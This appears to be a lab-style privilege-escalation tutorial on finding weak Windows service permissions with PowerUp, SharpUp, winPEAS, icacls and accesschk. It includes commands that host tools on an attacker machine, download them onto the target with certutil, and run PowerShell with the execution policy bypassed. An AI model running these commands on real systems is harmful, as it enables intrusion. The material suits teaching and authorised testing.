ENUMERATING SERVICES PERMISSION WITH POWERUP¶
-
If you don’t already have PowerUp, you can get PowerUp.ps1 using the following command:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
-
Host the PowerUp.ps1 Script Using Python:
python3 -m http.server 8000
-
Transfer the script to the target machine using certutil:
certutil -urlcache -f http://[IP-ADRESS]:8000/PowerUp.ps1 PowerUp.ps1
-
To bypass the PowerShell execution policy and execute the PowerUp.ps1 in a single line:
powershell -ep bypass -c "& {.\PowerUp.ps1}"
ENUMERATING SERVICES PERMISSION WITH SHARPUP¶
SharpUp is a free and open-source tool that can check for weaknesses in Windows services. It can scan for a variety of vulnerabilities related to standard privesc techniques.
-
If you don’t already have SharpUp, you can get SharpUp.exe using the following command:
wget https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/SharpUp.exe
-
Host the Powershell Script Using Python:
python3 -m http.server 8000
-
Transfer the script to the target machine using certutil:
certutil -urlcache -f http://[IP-ADRESS]:8000/SharpUp.exe SharpUp.exe
-
To run all the checks, execute the command audit. The tool has identified the filepermsvc service as vulnerable to modification, as shown below.
.\SharpUp.exe audit
ENUMERATING SERVICES PERMISSION WITH WINPEAS¶
-
Since the target runs a 64-bit OS, we can send 64-bit winPEAS via a Python HTTP server..
python3 -m http.server 8000
NOTE: We can identify that the target machine has a 64-bit architecture using the following command:
systeminfo | findstr /B /C:"System Type" -
Transfer winPEAS to target machine Using certutil
certutil -urlcache -f http://[IP-ADRESS]:8000/winPEASx64.exe winPEASx64.exe
-
Now, all we need to do is run winPEAS to search for weak service permissions
.\winPEASx64.exe
NOTE: The Services Information section in winPEAS provides a comprehensive list of all services, along with their configurations and potential security issues.
ENUMERATING WEAK SERVICE FILE PERMISSIONS (ICACLS)¶
-
To verify folder permissions with icacls, it's important to understand the permissions.
Check Microsoft documentation to learn more about permissions.
-
Lets view the permissions on the c:\Program Files\File folder
icacls "C:\Program Files\File Permissions Service"
NOTE: This shows that BUILTIN\Users have (RX) Read & Execute permissions for this folder.
-
we can check permission of binary it self
icacls "C:\Program Files\File Permissions Service\filepermservice.exe"
NOTE: This shows that Everyone has (F) Full Control permissions for C:\Program Files\File Permissions Service\filepermservice.exe, allowing any user to read, execute, modify, or delete the service binary.
ENUMERATING WEAK SERVICE FILE PERMISSIONS (ACCESSCHK)¶
-
If you don't have the Sysinternals Suite on your machine, you can download it from the official Microsoft Website.
NOTE: We have identified that the target machine is a 64-bit architecture using the following command:
systeminfo | findstr /B /C:"System Type" -
Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
certutil -urlcache -f http://[IP-ADRESS]:8000/accesschk64.exe accesschk64.exe
NOTE: With accesschk now on the target system, we can use the following command to enumerate the folder permissions
-
Let's view the permissions on the C:\Program Files\File Permissions Service\filepermservice.exe
.\accesschk64.exe -wvu "C:\Program Files\File Permissions Service\filepermservice.exe" -accepteula
NOTE: This shows that Everyone has (RW) Read and Write permissions for C:\Program Files\File Permissions Service\filepermservice.exe, granting any user full access to read, execute, modify, or delete the service binary.